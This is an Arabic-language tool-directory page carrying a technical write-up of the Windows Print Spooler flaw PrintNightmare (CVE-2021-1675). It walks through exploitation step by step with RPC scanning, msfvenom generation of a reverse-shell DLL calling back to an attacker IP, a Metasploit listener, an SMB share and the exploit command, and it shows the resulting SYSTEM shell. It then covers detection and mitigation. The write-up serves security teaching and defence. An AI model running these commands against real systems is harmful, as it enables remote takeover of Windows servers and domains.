Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — كتابة فنية وتحليل لثغرة PrintNightmare (CVE-2021-1675 / CVE-2021-34527)، تغطي استغلال RCE/LPE، والكشف عبر سجلات أحداث Windows، والتخفيف من مخاطر Print Spooler. | Kitploit
أدوات/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالأوراق والأبحاثالتعلم والتعليمالاستجابة للحوادثتحليل السجلات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

كتابة فنية وتحليل لثغرة PrintNightmare (CVE-2021-1675 / CVE-2021-34527)، تغطي استغلال RCE/LPE، والكشف عبر سجلات أحداث Windows، والتخفيف من مخاطر Print Spooler.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

بحث الثغرات: رفع الصلاحيات المحلي وتنفيذ الأوامر عن بُعد عبر Windows Print Spooler (PrintNightmare / CVE-2021-1675)

يحتوي المستودع على تقرير فني مفصل (Write-up) وتحليل لمفهوم استغلال ثغرة حرجة في خدمة مدير الطباعة في Windows (Print Spooler)، تتيح لمستخدم مجال منخفض الصلاحيات تنفيذ تعليمات برمجية عشوائية عن بُعد بأعلى صلاحيات النظام.

🛑 تحذير وإخلاء مسؤولية: تم إعداد هذه المادة لأغراض تعليمية فقط ولإجراء تدقيق أمني مشروع (Pentest). يُعد استخدام التقنيات الموصوفة ضد الأنظمة دون موافقة كتابية مسبقة من المالكين مخالفاً للقانون.


📌 الأهمية وسياق البحث

تمثل ثغرات عائلة PrintNightmare تهديدًا حرجًا للبيئات المؤسسية القائمة على Windows Server و Active Directory. يسمح العيب المعماري في التحقق من الصلاحيات في واجهات RPC MS-RPRN (Print System Remote Protocol) و MS-PAR (Print System Asynchronous Remote Protocol) بطلب تثبيت برامج تشغيل الطابعة على الخادم البعيد بشكل مشروع.

يكمن الخطر الرئيسي في أن خدمة مدير الطباعة (spoolsv.exe) نشطة افتراضيًا على معظم الخوادم، بما في ذلك وحدات تحكم المجال (Domain Controllers)، وتعمل في سياق أعلى الصلاحيات NT AUTHORITY\SYSTEM. إن اختراق حساب واحد منخفض الصلاحيات (على سبيل المثال عبر التصيد) يسمح للمهاجم بالاستيلاء الفوري على السيطرة الكاملة على البنية التحتية لـ Active Directory.


🏗 بنية البحث ومجموعة الأدوات

  • الهدف: الحصول على السيطرة على مضيف Windows بعيد عبر واجهات الطباعة RPC.
  • متجه الهجوم: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • الأدوات: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, استغلال Python.

📈 المسار العملي للاستغلال

الخطوة 1. الاستطلاع وجمع بيانات الاعتماد (Reconnaissance)

لتنفيذ متجه تنفيذ الأوامر عن بُعد (RCE)، يلزم وجود بيانات اعتماد مجال صالحة لمستخدم بأقل الصلاحيات (مقدمة ضمن شروط البحث).

  • الفحص الأساسي للخدمة: خدمة Print Spooler (spoolsv.exe) على جهاز Windows الهدف نشطة وتعمل بأعلى الصلاحيات SYSTEM، مما يفتح إمكانية مباشرة لرفع الصلاحيات محليًا (LPE) على المضيف عبر تحميل مكتبة غير موثوقة.

الخطوة 2. فحص واجهات RPC (Scanning)

قبل تشغيل الاستغلال الرئيسي، يجب التأكد من أن الجهاز البعيد يقدم بروتوكولات الطباعة الضعيفة ومفتوح للتفاعل الشبكي. نقوم باستطلاع واجهات RPC للنظام المستهدف:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

مخرجات الطرفية المتوقعة:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • رؤية المرحلة: أعاد المضيف المستهدف بنجاح أسطر البروتوكولات [MS-RPRN] و [MS-PAR]. وهذا يؤكد بنسبة 100% أن النظام يدعم واجهات الطباعة عن بُعد اللازمة وهو عرضة لمتجه PrintNightmare.

الخطوة 3. إعداد الحمولة والبنية التحتية (Weaponization)

1. توليد DLL خبيث مع قشرة عكسية:

نقوم بإنشاء حمولة لبنية x64، مع تحديد عنوان IP لجهاز المهاجم من أجل الاتصال العكسي:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. تشغيل مستمع في الخلفية داخل Metasploit:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. نشر مشاركة SMB محلية:

يجب أن تتاح لخادم Windows الهدف إمكانية مشروعة لتنزيل مكتبة DLL الخاصة بنا عبر الشبكة دون استخدام أدوات خارجية. نقوم بتشغيل خادم SMB مع دعم بروتوكول SMBv2 من المجلد /tmp:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

الخطوة 4. الاستغلال والسيطرة على النظام (Exploitation)

نقوم بتشغيل سكربت الاستغلال المكتوب بلغة Python، مع تمرير بيانات اعتماد مستخدم مجال منخفض الصلاحيات ومسار UNC إلى المكتبة الخبيثة على مشاركة SMB المحلية لدينا:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

سجل اعتراض الجلسة بنجاح (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Корпорация Майкрософт (Microsoft Corporation). Все права защищены.

C:\Windows\system32> whoami
nt authority\system
  • النتيجة: بعد تشغيل الاستغلال، قامت خدمة الطباعة البعيدة بتحميل برنامج التشغيل الخبيث من المجلد الشبكي بنجاح. تم فتح جلسة Meterpreter في Metasploit بصلاحيات NT AUTHORITY\SYSTEM الأعلى. تم اختراق الهدف بالكامل.

🔍 مؤشرات الاختراق والكشف (Detection)

بالنسبة لمتخصصي الفريق الأزرق (Blue Team)، يعتمد اكتشاف استغلال PrintNightmare على تدقيق سجلات نظام Windows وتتبع النشاط غير الطبيعي للعمليات.

1. مراقبة أحداث Windows (Event Logs)

يترك التشغيل الناجح للاستغلال سجلات مميزة في سجلات الطباعة وسجلات النظام:

  • Event ID 808 (PrintService): تسجيل فشل أو تحميل غير نمطي لوحدة الطابعة. يتيح رؤية اسم DLL الخارجي الذي تم تحميله (على سبيل المثال، من المسارات C:\Windows\System32\spool\drivers\x64\3\).
  • Event ID 7031 (System): إعادة تشغيل قسرية مفاجئة لخدمة مدير الطباعة (Print Spooler)، ناتجة عن عمل غير مستقر للاستغلال.

2. سلوك العمليات (EDR / Sysmon)

  • نشاط العمليات الفرعية غير الطبيعي: ظهور عمليات سطر الأوامر (cmd.exe, powershell.exe) أو أدوات جمع البيانات التي يكون أصلها هو عملية نظام مدير الطباعة spoolsv.exe. في الظروف المشروعة، لا يقوم spoolsv.exe أبدًا بإنشاء قذائف أوامر.
  • النشاط الشبكي: إنشاء اتصالات شبكية صادرة من العملية spoolsv.exe إلى موارد SMB خارجية (المنفذ 445) لتنزيل ملفات برامج التشغيل.

🛡 توصيات لمعالجة الثغرة (Mitigation)

  1. التعطيل الكامل للخدمة (موصى به): إذا كان الخادم لا يؤدي وظائف الطباعة (خاصة على وحدات تحكم المجال)، فيجب تعطيل خدمة Print Spooler بالكامل وتحويلها إلى الوضع Disabled.
  2. تقييد الطباعة عن بُعد: تعطيل إمكانية الطباعة عن بُعد عبر نهج المجموعة (GPO):
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. تثبيت التحديثات: تثبيت تحديثات الأمان الرسمية من Microsoft (KB) في الوقت المناسب لسد ثغرات تنفيذ الأوامر عن بُعد في نظام الطباعة الفرعي.

🔗 روابط ومواد مفيدة

  • قاعدة بيانات CVE: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • مقالات تحليلية: Microsoft Security Update Advisory
تنزيل الأداة